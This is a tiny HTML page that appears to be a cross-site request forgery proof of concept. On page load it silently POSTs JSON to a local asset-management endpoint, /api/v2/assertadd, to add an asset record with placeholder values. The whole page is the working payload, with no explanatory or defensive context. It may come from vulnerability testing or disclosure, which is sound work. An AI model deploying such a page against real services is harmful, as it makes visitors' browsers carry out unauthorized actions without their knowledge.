<!DOCTYPE html>
<html>
<script src="https://cdn.staticfile.org/jquery/1.10.2/jquery.min.js"></script>
<script type="text/javascript">
        window.onload=function(){
                $.ajax({
                        url:"http://127.0.0.1/api/v2/assertadd",
                        type:"POST",
                        data:'{"ip":"","mac":"","company":"pp","disk_len":"8g","mem_len":"64","cpu_len":"8","location":"testing"}',
                        contentType:"application/json"
                });
        }
</script>
</html>
